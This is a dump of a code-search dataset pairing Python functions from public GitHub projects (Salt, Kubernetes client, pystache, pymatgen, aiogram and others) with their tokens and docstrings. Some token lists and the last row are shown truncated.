repo
stringlengths
7
54
path
stringlengths
4
192
url
stringlengths
87
284
code
stringlengths
78
104k
code_tokens
list
docstring
stringlengths
1
46.9k
docstring_tokens
list
language
stringclasses
1 value
partition
stringclasses
3 values
KelSolaar/Umbra
umbra/components/factory/script_editor/script_editor.py
https://github.com/KelSolaar/Umbra/blob/66f45f08d9d723787f1191989f8b0dda84b412ce/umbra/components/factory/script_editor/script_editor.py#L1838-L1844
def __Script_Editor_Output_plainTextEdit_set_default_view_state(self): """ Sets the **Script_Editor_Output_plainTextEdit** Widget default View state. """ self.Script_Editor_Output_plainTextEdit.moveCursor(QTextCursor.End) self.Script_Editor_Output_plainTextEdit.ensureCursorVisible()
[ "def", "__Script_Editor_Output_plainTextEdit_set_default_view_state", "(", "self", ")", ":", "self", ".", "Script_Editor_Output_plainTextEdit", ".", "moveCursor", "(", "QTextCursor", ".", "End", ")", "self", ".", "Script_Editor_Output_plainTextEdit", ".", "ensureCursorVisible...
Sets the **Script_Editor_Output_plainTextEdit** Widget default View state.
[ "Sets", "the", "**", "Script_Editor_Output_plainTextEdit", "**", "Widget", "default", "View", "state", "." ]
python
train
fabric-bolt/fabric-bolt
fabric_bolt/projects/views.py
https://github.com/fabric-bolt/fabric-bolt/blob/0f434783026f1b9ce16a416fa496d76921fe49ca/fabric_bolt/projects/views.py#L162-L171
def form_valid(self, form): """After the form is valid lets let people know""" ret = super(ProjectCopy, self).form_valid(form) self.copy_relations() # Good to make note of that messages.add_message(self.request, messages.SUCCESS, 'Project %s copied' % self.object.name) return ret
[ "def", "form_valid", "(", "self", ",", "form", ")", ":", "ret", "=", "super", "(", "ProjectCopy", ",", "self", ")", ".", "form_valid", "(", "form", ")", "self", ".", "copy_relations", "(", ")", "# Good to make note of that", "messages", ".", "add_message", ...
After the form is valid lets let people know
[ "After", "the", "form", "is", "valid", "lets", "let", "people", "know" ]
python
train
eqcorrscan/EQcorrscan
eqcorrscan/core/match_filter.py
https://github.com/eqcorrscan/EQcorrscan/blob/3121b4aca801ee5d38f56ca297ce1c0f9515d9ff/eqcorrscan/core/match_filter.py#L743-L810
def read(self, filename=None, read_detection_catalog=True): """ Read a Party from a file. :type filename: str :param filename: File to read from - can be a list of files, and can contain wildcards. :type read_detection_catalog: bool :param read_detection_catalog: Whether to read the detection catalog or not, if False, catalog will be regenerated - for large catalogs this can be faster. .. rubric:: Example >>> Party().read() Party of 4 Families. """ tribe = Tribe() families = [] if filename is None: # If there is no filename given, then read the example. filename = os.path.join(os.path.dirname(__file__), '..', 'tests', 'test_data', 'test_party.tgz') if isinstance(filename, list): filenames = [] for _filename in filename: # Expand wildcards filenames.extend(glob.glob(_filename)) else: # Expand wildcards filenames = glob.glob(filename) for _filename in filenames: with tarfile.open(_filename, "r:*") as arc: temp_dir = tempfile.mkdtemp() arc.extractall(path=temp_dir, members=_safemembers(arc)) # Read in the detections first, this way, if we read from multiple # files then we can just read in extra templates as needed. # Read in families here! party_dir = glob.glob(temp_dir + os.sep + '*')[0] tribe._read_from_folder(dirname=party_dir) det_cat_file = glob.glob(os.path.join(party_dir, "catalog.*")) if len(det_cat_file) != 0 and read_detection_catalog: try: all_cat = read_events(det_cat_file[0]) except TypeError as e: print(e) pass else: all_cat = Catalog() for family_file in glob.glob(join(party_dir, '*_detections.csv')): template = [ t for t in tribe if _templates_match(t, family_file)] family = Family(template=template[0] or Template()) new_family = True if family.template.name in [f.template.name for f in families]: family = [ f for f in families if f.template.name == family.template.name][0] new_family = False family.detections = _read_family( fname=family_file, all_cat=all_cat, template=template[0]) if new_family: families.append(family) shutil.rmtree(temp_dir) self.families = families return self
[ "def", "read", "(", "self", ",", "filename", "=", "None", ",", "read_detection_catalog", "=", "True", ")", ":", "tribe", "=", "Tribe", "(", ")", "families", "=", "[", "]", "if", "filename", "is", "None", ":", "# If there is no filename given, then read the exa...
Read a Party from a file. :type filename: str :param filename: File to read from - can be a list of files, and can contain wildcards. :type read_detection_catalog: bool :param read_detection_catalog: Whether to read the detection catalog or not, if False, catalog will be regenerated - for large catalogs this can be faster. .. rubric:: Example >>> Party().read() Party of 4 Families.
[ "Read", "a", "Party", "from", "a", "file", "." ]
python
train
LuqueDaniel/pybooru
pybooru/api_moebooru.py
https://github.com/LuqueDaniel/pybooru/blob/60cd5254684d293b308f0b11b8f4ac2dce101479/pybooru/api_moebooru.py#L309-L317
def wiki_create(self, title, body): """Action to lets you create a wiki page (Requires login) (UNTESTED). Parameters: title (str): The title of the wiki page. body (str): The body of the wiki page. """ params = {'wiki_page[title]': title, 'wiki_page[body]': body} return self._get('wiki/create', params, method='POST')
[ "def", "wiki_create", "(", "self", ",", "title", ",", "body", ")", ":", "params", "=", "{", "'wiki_page[title]'", ":", "title", ",", "'wiki_page[body]'", ":", "body", "}", "return", "self", ".", "_get", "(", "'wiki/create'", ",", "params", ",", "method", ...
Action to lets you create a wiki page (Requires login) (UNTESTED). Parameters: title (str): The title of the wiki page. body (str): The body of the wiki page.
[ "Action", "to", "lets", "you", "create", "a", "wiki", "page", "(", "Requires", "login", ")", "(", "UNTESTED", ")", "." ]
python
train
GoogleCloudPlatform/compute-image-packages
packages/python-google-compute-engine/google_compute_engine/metadata_scripts/script_retriever.py
https://github.com/GoogleCloudPlatform/compute-image-packages/blob/53ea8cd069fb4d9a1984d1c167e54c133033f8da/packages/python-google-compute-engine/google_compute_engine/metadata_scripts/script_retriever.py#L170-L198
def _GetAttributeScripts(self, attribute_data, dest_dir): """Retrieve the scripts from attribute metadata. Args: attribute_data: dict, the contents of the attributes metadata. dest_dir: string, the path to a directory for storing metadata scripts. Returns: dict, a dictionary mapping metadata keys to files storing scripts. """ script_dict = {} attribute_data = attribute_data or {} metadata_key = '%s-script' % self.script_type metadata_value = attribute_data.get(metadata_key) if metadata_value: self.logger.info('Found %s in metadata.', metadata_key) with tempfile.NamedTemporaryFile( mode='w', dir=dest_dir, delete=False) as dest: dest.write(metadata_value.lstrip()) script_dict[metadata_key] = dest.name metadata_key = '%s-script-url' % self.script_type metadata_value = attribute_data.get(metadata_key) if metadata_value: self.logger.info('Found %s in metadata.', metadata_key) script_dict[metadata_key] = self._DownloadScript( metadata_value, dest_dir) return script_dict
[ "def", "_GetAttributeScripts", "(", "self", ",", "attribute_data", ",", "dest_dir", ")", ":", "script_dict", "=", "{", "}", "attribute_data", "=", "attribute_data", "or", "{", "}", "metadata_key", "=", "'%s-script'", "%", "self", ".", "script_type", "metadata_va...
Retrieve the scripts from attribute metadata. Args: attribute_data: dict, the contents of the attributes metadata. dest_dir: string, the path to a directory for storing metadata scripts. Returns: dict, a dictionary mapping metadata keys to files storing scripts.
[ "Retrieve", "the", "scripts", "from", "attribute", "metadata", "." ]
python
train
liampauling/betfair
betfairlightweight/endpoints/historic.py
https://github.com/liampauling/betfair/blob/8479392eb4849c525d78d43497c32c0bb108e977/betfairlightweight/endpoints/historic.py#L22-L33
def get_my_data(self, session=None): """ Returns a list of data descriptions for data which has been purchased by the signed in user. :param requests.session session: Requests session object :rtype: dict """ params = clean_locals(locals()) method = 'GetMyData' (response, elapsed_time) = self.request(method, params, session) return response
[ "def", "get_my_data", "(", "self", ",", "session", "=", "None", ")", ":", "params", "=", "clean_locals", "(", "locals", "(", ")", ")", "method", "=", "'GetMyData'", "(", "response", ",", "elapsed_time", ")", "=", "self", ".", "request", "(", "method", ...
Returns a list of data descriptions for data which has been purchased by the signed in user. :param requests.session session: Requests session object :rtype: dict
[ "Returns", "a", "list", "of", "data", "descriptions", "for", "data", "which", "has", "been", "purchased", "by", "the", "signed", "in", "user", "." ]
python
train
keenlabs/KeenClient-Python
keen/api.py
https://github.com/keenlabs/KeenClient-Python/blob/266387c3376d1e000d117e17c45045ae3439d43f/keen/api.py#L113-L127
def post_events(self, events): """ Posts a single event to the Keen IO API. The write key must be set first. :param events: an Event to upload """ url = "{0}/{1}/projects/{2}/events".format(self.base_url, self.api_version, self.project_id) headers = utilities.headers(self.write_key) payload = json.dumps(events) response = self.fulfill(HTTPMethods.POST, url, data=payload, headers=headers, timeout=self.post_timeout) self._error_handling(response) return self._get_response_json(response)
[ "def", "post_events", "(", "self", ",", "events", ")", ":", "url", "=", "\"{0}/{1}/projects/{2}/events\"", ".", "format", "(", "self", ".", "base_url", ",", "self", ".", "api_version", ",", "self", ".", "project_id", ")", "headers", "=", "utilities", ".", ...
Posts a single event to the Keen IO API. The write key must be set first. :param events: an Event to upload
[ "Posts", "a", "single", "event", "to", "the", "Keen", "IO", "API", ".", "The", "write", "key", "must", "be", "set", "first", "." ]
python
train
aiogram/aiogram
aiogram/types/chat.py
https://github.com/aiogram/aiogram/blob/2af930149ce2482547721e2c8755c10307295e48/aiogram/types/chat.py#L530-L539
async def typing(cls, sleep=None): """ Do typing :param sleep: sleep timeout :return: """ if isinstance(sleep, str): sleep = cls.calc_timeout(sleep) await cls._do(cls.TYPING, sleep)
[ "async", "def", "typing", "(", "cls", ",", "sleep", "=", "None", ")", ":", "if", "isinstance", "(", "sleep", ",", "str", ")", ":", "sleep", "=", "cls", ".", "calc_timeout", "(", "sleep", ")", "await", "cls", ".", "_do", "(", "cls", ".", "TYPING", ...
Do typing :param sleep: sleep timeout :return:
[ "Do", "typing" ]
python
train
tomplus/kubernetes_asyncio
kubernetes_asyncio/client/api/settings_v1alpha1_api.py
https://github.com/tomplus/kubernetes_asyncio/blob/f9ab15317ec921409714c7afef11aeb0f579985d/kubernetes_asyncio/client/api/settings_v1alpha1_api.py#L879-L903
def read_namespaced_pod_preset(self, name, namespace, **kwargs): # noqa: E501 """read_namespaced_pod_preset # noqa: E501 read the specified PodPreset # noqa: E501 This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please pass async_req=True >>> thread = api.read_namespaced_pod_preset(name, namespace, async_req=True) >>> result = thread.get() :param async_req bool :param str name: name of the PodPreset (required) :param str namespace: object name and auth scope, such as for teams and projects (required) :param str pretty: If 'true', then the output is pretty printed. :param bool exact: Should the export be exact. Exact export maintains cluster-specific fields like 'Namespace'. :param bool export: Should this value be exported. Export strips fields that a user can not specify. :return: V1alpha1PodPreset If the method is called asynchronously, returns the request thread. """ kwargs['_return_http_data_only'] = True if kwargs.get('async_req'): return self.read_namespaced_pod_preset_with_http_info(name, namespace, **kwargs) # noqa: E501 else: (data) = self.read_namespaced_pod_preset_with_http_info(name, namespace, **kwargs) # noqa: E501 return data
[ "def", "read_namespaced_pod_preset", "(", "self", ",", "name", ",", "namespace", ",", "*", "*", "kwargs", ")", ":", "# noqa: E501", "kwargs", "[", "'_return_http_data_only'", "]", "=", "True", "if", "kwargs", ".", "get", "(", "'async_req'", ")", ":", "return...
read_namespaced_pod_preset # noqa: E501 read the specified PodPreset # noqa: E501 This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please pass async_req=True >>> thread = api.read_namespaced_pod_preset(name, namespace, async_req=True) >>> result = thread.get() :param async_req bool :param str name: name of the PodPreset (required) :param str namespace: object name and auth scope, such as for teams and projects (required) :param str pretty: If 'true', then the output is pretty printed. :param bool exact: Should the export be exact. Exact export maintains cluster-specific fields like 'Namespace'. :param bool export: Should this value be exported. Export strips fields that a user can not specify. :return: V1alpha1PodPreset If the method is called asynchronously, returns the request thread.
[ "read_namespaced_pod_preset", "#", "noqa", ":", "E501" ]
python
train
saltstack/salt
salt/modules/schedule.py
https://github.com/saltstack/salt/blob/e8541fd6e744ab0df786c0f76102e41631f45d46/salt/modules/schedule.py#L598-L650
def enable_job(name, **kwargs): ''' Enable a job in the minion's schedule CLI Example: .. code-block:: bash salt '*' schedule.enable_job job1 ''' ret = {'comment': [], 'result': True} if not name: ret['comment'] = 'Job name is required.' ret['result'] = False if 'test' in __opts__ and __opts__['test']: ret['comment'] = 'Job: {0} would be enabled in schedule.'.format(name) else: persist = True if 'persist' in kwargs: persist = kwargs['persist'] if name in list_(show_all=True, where='opts', return_yaml=False): event_data = {'name': name, 'func': 'enable_job', 'persist': persist} elif name in list_(show_all=True, where='pillar', return_yaml=False): event_data = {'name': name, 'where': 'pillar', 'func': 'enable_job', 'persist': False} else: ret['comment'] = 'Job {0} does not exist.'.format(name) ret['result'] = False return ret try: eventer = salt.utils.event.get_event('minion', opts=__opts__) res = __salt__['event.fire'](event_data, 'manage_schedule') if res: event_ret = eventer.get_event(tag='/salt/minion/minion_schedule_enabled_job_complete', wait=30) if event_ret and event_ret['complete']: schedule = event_ret['schedule'] # check item exists in schedule and is enabled if name in schedule and schedule[name]['enabled']: ret['result'] = True ret['comment'] = 'Enabled Job {0} in schedule.'.format(name) else: ret['result'] = False ret['comment'] = 'Failed to enable job {0} in schedule.'.format(name) return ret except KeyError: # Effectively a no-op, since we can't really return without an event system ret['comment'] = 'Event module not available. Schedule enable job failed.' return ret
[ "def", "enable_job", "(", "name", ",", "*", "*", "kwargs", ")", ":", "ret", "=", "{", "'comment'", ":", "[", "]", ",", "'result'", ":", "True", "}", "if", "not", "name", ":", "ret", "[", "'comment'", "]", "=", "'Job name is required.'", "ret", "[", ...
Enable a job in the minion's schedule CLI Example: .. code-block:: bash salt '*' schedule.enable_job job1
[ "Enable", "a", "job", "in", "the", "minion", "s", "schedule" ]
python
train
bbangert/lettuce_webdriver
lettuce_webdriver/screenshot.py
https://github.com/bbangert/lettuce_webdriver/blob/d11f8531c43bb7150c316e0dc4ccd083617becf7/lettuce_webdriver/screenshot.py#L13-L22
def set_save_directory(base, source): """Sets the root save directory for saving screenshots. Screenshots will be saved in subdirectories under this directory by browser window size. """ root = os.path.join(base, source) if not os.path.isdir(root): os.makedirs(root) world.screenshot_root = root
[ "def", "set_save_directory", "(", "base", ",", "source", ")", ":", "root", "=", "os", ".", "path", ".", "join", "(", "base", ",", "source", ")", "if", "not", "os", ".", "path", ".", "isdir", "(", "root", ")", ":", "os", ".", "makedirs", "(", "roo...
Sets the root save directory for saving screenshots. Screenshots will be saved in subdirectories under this directory by browser window size.
[ "Sets", "the", "root", "save", "directory", "for", "saving", "screenshots", ".", "Screenshots", "will", "be", "saved", "in", "subdirectories", "under", "this", "directory", "by", "browser", "window", "size", "." ]
python
train
Jajcus/pyxmpp2
pyxmpp2/ext/dataforms.py
https://github.com/Jajcus/pyxmpp2/blob/14a40a3950910a9cd008b55f0d8905aa0186ce18/pyxmpp2/ext/dataforms.py#L270-L299
def complete_xml_element(self, xmlnode, doc): """Complete the XML node with `self` content. :Parameters: - `xmlnode`: XML node with the element being built. It has already right name and namespace, but no attributes or content. - `doc`: document to which the element belongs. :Types: - `xmlnode`: `libxml2.xmlNode` - `doc`: `libxml2.xmlDoc`""" if self.type is not None and self.type not in self.allowed_types: raise ValueError("Invalid form field type: %r" % (self.type,)) if self.type is not None: xmlnode.setProp("type", self.type) if not self.label is None: xmlnode.setProp("label", to_utf8(self.label)) if not self.name is None: xmlnode.setProp("var", to_utf8(self.name)) if self.values: if self.type and len(self.values) > 1 and not self.type.endswith(u"-multi"): raise ValueError("Multiple values not allowed for %r field" % (self.type,)) for value in self.values: xmlnode.newTextChild(xmlnode.ns(), "value", to_utf8(value)) for option in self.options: option.as_xml(xmlnode, doc) if self.required: xmlnode.newChild(xmlnode.ns(), "required", None) if self.desc: xmlnode.newTextChild(xmlnode.ns(), "desc", to_utf8(self.desc)) return xmlnode
[ "def", "complete_xml_element", "(", "self", ",", "xmlnode", ",", "doc", ")", ":", "if", "self", ".", "type", "is", "not", "None", "and", "self", ".", "type", "not", "in", "self", ".", "allowed_types", ":", "raise", "ValueError", "(", "\"Invalid form field ...
Complete the XML node with `self` content. :Parameters: - `xmlnode`: XML node with the element being built. It has already right name and namespace, but no attributes or content. - `doc`: document to which the element belongs. :Types: - `xmlnode`: `libxml2.xmlNode` - `doc`: `libxml2.xmlDoc`
[ "Complete", "the", "XML", "node", "with", "self", "content", "." ]
python
valid
boriel/zxbasic
arch/zx48k/optimizer.py
https://github.com/boriel/zxbasic/blob/23b28db10e41117805bdb3c0f78543590853b132/arch/zx48k/optimizer.py#L1654-L1662
def get_label_idx(self, label): """ Returns the index of a label. Returns None if not found. """ for i in range(len(self)): if self.mem[i].is_label and self.mem[i].inst == label: return i return None
[ "def", "get_label_idx", "(", "self", ",", "label", ")", ":", "for", "i", "in", "range", "(", "len", "(", "self", ")", ")", ":", "if", "self", ".", "mem", "[", "i", "]", ".", "is_label", "and", "self", ".", "mem", "[", "i", "]", ".", "inst", "...
Returns the index of a label. Returns None if not found.
[ "Returns", "the", "index", "of", "a", "label", ".", "Returns", "None", "if", "not", "found", "." ]
python
train
themartorana/python-postmark
postmark/core.py
https://github.com/themartorana/python-postmark/blob/3087f6894ec2790e295fd59eba9c57da9de78d1c/postmark/core.py#L615-L620
def remove_message(self, message): ''' Remove a message from the batch ''' if message in self.__messages: self.__messages.remove(message)
[ "def", "remove_message", "(", "self", ",", "message", ")", ":", "if", "message", "in", "self", ".", "__messages", ":", "self", ".", "__messages", ".", "remove", "(", "message", ")" ]
Remove a message from the batch
[ "Remove", "a", "message", "from", "the", "batch" ]
python
train
jtwhite79/pyemu
pyemu/pst/pst_utils.py
https://github.com/jtwhite79/pyemu/blob/c504d8e7a4097cec07655a6318d275739bd8148a/pyemu/pst/pst_utils.py#L289-L304
def write_input_files(pst): """write parameter values to a model input files using a template files with current parameter values (stored in Pst.parameter_data.parval1). This is a simple implementation of what PEST does. It does not handle all the special cases, just a basic function...user beware Parameters ---------- pst : (pyemu.Pst) a Pst instance """ par = pst.parameter_data par.loc[:,"parval1_trans"] = (par.parval1 * par.scale) + par.offset for tpl_file,in_file in zip(pst.template_files,pst.input_files): write_to_template(pst.parameter_data.parval1_trans,tpl_file,in_file)
[ "def", "write_input_files", "(", "pst", ")", ":", "par", "=", "pst", ".", "parameter_data", "par", ".", "loc", "[", ":", ",", "\"parval1_trans\"", "]", "=", "(", "par", ".", "parval1", "*", "par", ".", "scale", ")", "+", "par", ".", "offset", "for", ...
write parameter values to a model input files using a template files with current parameter values (stored in Pst.parameter_data.parval1). This is a simple implementation of what PEST does. It does not handle all the special cases, just a basic function...user beware Parameters ---------- pst : (pyemu.Pst) a Pst instance
[ "write", "parameter", "values", "to", "a", "model", "input", "files", "using", "a", "template", "files", "with", "current", "parameter", "values", "(", "stored", "in", "Pst", ".", "parameter_data", ".", "parval1", ")", ".", "This", "is", "a", "simple", "im...
python
train
vladsaveliev/TargQC
targqc/utilz/jsontemplate/_jsontemplate.py
https://github.com/vladsaveliev/TargQC/blob/e887c36b2194dbd73c6ea32989b6cb84c6c0e58d/targqc/utilz/jsontemplate/_jsontemplate.py#L454-L463
def NewOrClause(self, pred_str): """ {.or ...} Can appear inside predicate blocks or section blocks, with slightly different meaning. """ if pred_str: pred = self._GetPredicate(pred_str, test_attr=False) else: pred = None self.current_section.NewOrClause(pred)
[ "def", "NewOrClause", "(", "self", ",", "pred_str", ")", ":", "if", "pred_str", ":", "pred", "=", "self", ".", "_GetPredicate", "(", "pred_str", ",", "test_attr", "=", "False", ")", "else", ":", "pred", "=", "None", "self", ".", "current_section", ".", ...
{.or ...} Can appear inside predicate blocks or section blocks, with slightly different meaning.
[ "{", ".", "or", "...", "}", "Can", "appear", "inside", "predicate", "blocks", "or", "section", "blocks", "with", "slightly", "different", "meaning", "." ]
python
train
tanghaibao/goatools
goatools/obo_parser.py
https://github.com/tanghaibao/goatools/blob/407682e573a108864a79031f8ca19ee3bf377626/goatools/obo_parser.py#L245-L251
def get_all_child_edges(self): """Return tuples for all child GO IDs, containing current GO ID and child GO ID.""" all_child_edges = set() for parent in self.children: all_child_edges.add((parent.item_id, self.item_id)) all_child_edges |= parent.get_all_child_edges() return all_child_edges
[ "def", "get_all_child_edges", "(", "self", ")", ":", "all_child_edges", "=", "set", "(", ")", "for", "parent", "in", "self", ".", "children", ":", "all_child_edges", ".", "add", "(", "(", "parent", ".", "item_id", ",", "self", ".", "item_id", ")", ")", ...
Return tuples for all child GO IDs, containing current GO ID and child GO ID.
[ "Return", "tuples", "for", "all", "child", "GO", "IDs", "containing", "current", "GO", "ID", "and", "child", "GO", "ID", "." ]
python
train
ktdreyer/txkoji
txkoji/connection.py
https://github.com/ktdreyer/txkoji/blob/a7de380f29f745bf11730b27217208f6d4da7733/txkoji/connection.py#L356-L370
def listTagged(self, *args, **kwargs): """ List builds tagged with a tag. Calls "listTagged" XML-RPC. :returns: deferred that when fired returns a list of Build objects. """ data = yield self.call('listTagged', *args, **kwargs) builds = [] for bdata in data: build = Build.fromDict(bdata) build.connection = self builds.append(build) defer.returnValue(builds)
[ "def", "listTagged", "(", "self", ",", "*", "args", ",", "*", "*", "kwargs", ")", ":", "data", "=", "yield", "self", ".", "call", "(", "'listTagged'", ",", "*", "args", ",", "*", "*", "kwargs", ")", "builds", "=", "[", "]", "for", "bdata", "in", ...
List builds tagged with a tag. Calls "listTagged" XML-RPC. :returns: deferred that when fired returns a list of Build objects.
[ "List", "builds", "tagged", "with", "a", "tag", "." ]
python
train
Dentosal/python-sc2
sc2/client.py
https://github.com/Dentosal/python-sc2/blob/608bd25f04e89d39cef68b40101d8e9a8a7f1634/sc2/client.py#L249-L270
async def query_available_abilities( self, units: Union[List[Unit], "Units"], ignore_resource_requirements: bool = False ) -> List[List[AbilityId]]: """ Query abilities of multiple units """ if not isinstance(units, list): """ Deprecated, accepting a single unit may be removed in the future, query a list of units instead """ assert isinstance(units, Unit) units = [units] input_was_a_list = False else: input_was_a_list = True assert units result = await self._execute( query=query_pb.RequestQuery( abilities=[query_pb.RequestQueryAvailableAbilities(unit_tag=unit.tag) for unit in units], ignore_resource_requirements=ignore_resource_requirements, ) ) """ Fix for bots that only query a single unit """ if not input_was_a_list: return [[AbilityId(a.ability_id) for a in b.abilities] for b in result.query.abilities][0] return [[AbilityId(a.ability_id) for a in b.abilities] for b in result.query.abilities]
[ "async", "def", "query_available_abilities", "(", "self", ",", "units", ":", "Union", "[", "List", "[", "Unit", "]", ",", "\"Units\"", "]", ",", "ignore_resource_requirements", ":", "bool", "=", "False", ")", "->", "List", "[", "List", "[", "AbilityId", "]...
Query abilities of multiple units
[ "Query", "abilities", "of", "multiple", "units" ]
python
train
jazzband/django-authority
authority/permissions.py
https://github.com/jazzband/django-authority/blob/58e08483cdd91a6a69e8019dd2a2edf68531ae97/authority/permissions.py#L119-L138
def _user_perm_cache(self): """ cached_permissions will generate the cache in a lazy fashion. """ # Check to see if the cache has been primed. if not self.user: return {} cache_filled = getattr( self.user, '_authority_perm_cache_filled', False, ) if cache_filled: # Don't really like the name for this, but this matches how Django # does it. return self.user._authority_perm_cache # Prime the cache. self._prime_user_perm_caches() return self.user._authority_perm_cache
[ "def", "_user_perm_cache", "(", "self", ")", ":", "# Check to see if the cache has been primed.", "if", "not", "self", ".", "user", ":", "return", "{", "}", "cache_filled", "=", "getattr", "(", "self", ".", "user", ",", "'_authority_perm_cache_filled'", ",", "Fals...
cached_permissions will generate the cache in a lazy fashion.
[ "cached_permissions", "will", "generate", "the", "cache", "in", "a", "lazy", "fashion", "." ]
python
train
nws-cip/zenconf
zenconf/merged_config.py
https://github.com/nws-cip/zenconf/blob/fc96706468c0741fb1b54b2eeb9f9225737e3e36/zenconf/merged_config.py#L47-L70
def walk_recursive(f, data): """ Recursively apply a function to all dicts in a nested dictionary :param f: Function to apply :param data: Dictionary (possibly nested) to recursively apply function to :return: """ results = {} if isinstance(data, list): return [walk_recursive(f, d) for d in data] elif isinstance(data, dict): results = funcy.walk_keys(f, data) for k, v in data.iteritems(): if isinstance(v, dict): results[f(k)] = walk_recursive(f, v) elif isinstance(v, list): results[f(k)] = [walk_recursive(f, d) for d in v] else: return f(data) return results
[ "def", "walk_recursive", "(", "f", ",", "data", ")", ":", "results", "=", "{", "}", "if", "isinstance", "(", "data", ",", "list", ")", ":", "return", "[", "walk_recursive", "(", "f", ",", "d", ")", "for", "d", "in", "data", "]", "elif", "isinstance...
Recursively apply a function to all dicts in a nested dictionary :param f: Function to apply :param data: Dictionary (possibly nested) to recursively apply function to :return:
[ "Recursively", "apply", "a", "function", "to", "all", "dicts", "in", "a", "nested", "dictionary" ]
python
train
defunkt/pystache
pystache/parser.py
https://github.com/defunkt/pystache/blob/17a5dfdcd56eb76af731d141de395a7632a905b8/pystache/parser.py#L242-L338
def parse(self, template): """ Parse a template string starting at some index. This method uses the current tag delimiter. Arguments: template: a unicode string that is the template to parse. index: the index at which to start parsing. Returns: a ParsedTemplate instance. """ self._compile_delimiters() start_index = 0 content_end_index, parsed_section, section_key = None, None, None parsed_template = ParsedTemplate() states = [] while True: match = self._template_re.search(template, start_index) if match is None: break match_index = match.start() end_index = match.end() matches = match.groupdict() # Normalize the matches dictionary. if matches['change'] is not None: matches.update(tag='=', tag_key=matches['delims']) elif matches['raw'] is not None: matches.update(tag='&', tag_key=matches['raw_name']) tag_type = matches['tag'] tag_key = matches['tag_key'] leading_whitespace = matches['whitespace'] # Standalone (non-interpolation) tags consume the entire line, # both leading whitespace and trailing newline. did_tag_begin_line = match_index == 0 or template[match_index - 1] in END_OF_LINE_CHARACTERS did_tag_end_line = end_index == len(template) or template[end_index] in END_OF_LINE_CHARACTERS is_tag_interpolating = tag_type in ['', '&'] if did_tag_begin_line and did_tag_end_line and not is_tag_interpolating: if end_index < len(template): end_index += template[end_index] == '\r' and 1 or 0 if end_index < len(template): end_index += template[end_index] == '\n' and 1 or 0 elif leading_whitespace: match_index += len(leading_whitespace) leading_whitespace = '' # Avoid adding spurious empty strings to the parse tree. if start_index != match_index: parsed_template.add(template[start_index:match_index]) start_index = end_index if tag_type in ('#', '^'): # Cache current state. state = (tag_type, end_index, section_key, parsed_template) states.append(state) # Initialize new state section_key, parsed_template = tag_key, ParsedTemplate() continue if tag_type == '/': if tag_key != section_key: raise ParsingError("Section end tag mismatch: %s != %s" % (tag_key, section_key)) # Restore previous state with newly found section data. parsed_section = parsed_template (tag_type, section_start_index, section_key, parsed_template) = states.pop() node = self._make_section_node(template, tag_type, tag_key, parsed_section, section_start_index, match_index) else: node = self._make_interpolation_node(tag_type, tag_key, leading_whitespace) parsed_template.add(node) # Avoid adding spurious empty strings to the parse tree. if start_index != len(template): parsed_template.add(template[start_index:]) return parsed_template
[ "def", "parse", "(", "self", ",", "template", ")", ":", "self", ".", "_compile_delimiters", "(", ")", "start_index", "=", "0", "content_end_index", ",", "parsed_section", ",", "section_key", "=", "None", ",", "None", ",", "None", "parsed_template", "=", "Par...
Parse a template string starting at some index. This method uses the current tag delimiter. Arguments: template: a unicode string that is the template to parse. index: the index at which to start parsing. Returns: a ParsedTemplate instance.
[ "Parse", "a", "template", "string", "starting", "at", "some", "index", "." ]
python
train
Kautenja/nes-py
nes_py/_image_viewer.py
https://github.com/Kautenja/nes-py/blob/a113885198d418f38fcf24b8f79ac508975788c2/nes_py/_image_viewer.py#L50-L80
def show(self, frame): """ Show an array of pixels on the window. Args: frame (numpy.ndarray): the frame to show on the window Returns: None """ # check that the frame has the correct dimensions if len(frame.shape) != 3: raise ValueError('frame should have shape with only 3 dimensions') # open the window if it isn't open already if not self.is_open: self.open() # prepare the window for the next frame self._window.clear() self._window.switch_to() self._window.dispatch_events() # create an image data object image = ImageData( frame.shape[1], frame.shape[0], 'RGB', frame.tobytes(), pitch=frame.shape[1]*-3 ) # send the image to the window image.blit(0, 0, width=self._window.width, height=self._window.height) self._window.flip()
[ "def", "show", "(", "self", ",", "frame", ")", ":", "# check that the frame has the correct dimensions", "if", "len", "(", "frame", ".", "shape", ")", "!=", "3", ":", "raise", "ValueError", "(", "'frame should have shape with only 3 dimensions'", ")", "# open the wind...
Show an array of pixels on the window. Args: frame (numpy.ndarray): the frame to show on the window Returns: None
[ "Show", "an", "array", "of", "pixels", "on", "the", "window", "." ]
python
train
materialsproject/pymatgen
pymatgen/util/convergence.py
https://github.com/materialsproject/pymatgen/blob/4ca558cf72f8d5f8a1f21dfdfc0181a971c186da/pymatgen/util/convergence.py#L325-L357
def multi_curve_fit(xs, ys, verbose): """ fit multiple functions to the x, y data, return the best fit """ #functions = {exponential: p0_exponential, reciprocal: p0_reciprocal, single_reciprocal: p0_single_reciprocal} functions = { exponential: p0_exponential, reciprocal: p0_reciprocal, #single_reciprocal: p0_single_reciprocal, simple_reciprocal: p0_simple_reciprocal, simple_2reciprocal: p0_simple_2reciprocal, simple_4reciprocal: p0_simple_4reciprocal, simple_5reciprocal: p0_simple_5reciprocal } from scipy.optimize import curve_fit fit_results = {} best = ['', np.inf] for function in functions: try: weights = get_weights(xs, ys) popt, pcov = curve_fit(function, xs, ys, functions[function](xs, ys), maxfev=8000, sigma=weights) pcov = [] m = measure(function, xs, ys, popt, weights) fit_results.update({function: {'measure': m, 'popt': popt, 'pcov': pcov}}) for f in fit_results: if fit_results[f]['measure'] <= best[1]: best = f, fit_results[f]['measure'] if verbose: print(str(function), m) except RuntimeError: print('no fit found for ', function) return fit_results[best[0]]['popt'], fit_results[best[0]]['pcov'], best
[ "def", "multi_curve_fit", "(", "xs", ",", "ys", ",", "verbose", ")", ":", "#functions = {exponential: p0_exponential, reciprocal: p0_reciprocal, single_reciprocal: p0_single_reciprocal}", "functions", "=", "{", "exponential", ":", "p0_exponential", ",", "reciprocal", ":", "p0...
fit multiple functions to the x, y data, return the best fit
[ "fit", "multiple", "functions", "to", "the", "x", "y", "data", "return", "the", "best", "fit" ]
python
train
brocade/pynos
pynos/versions/ver_7/ver_7_1_0/yang/brocade_vswitch.py
https://github.com/brocade/pynos/blob/bd8a34e98f322de3fc06750827d8bbc3a0c00380/pynos/versions/ver_7/ver_7_1_0/yang/brocade_vswitch.py#L402-L414
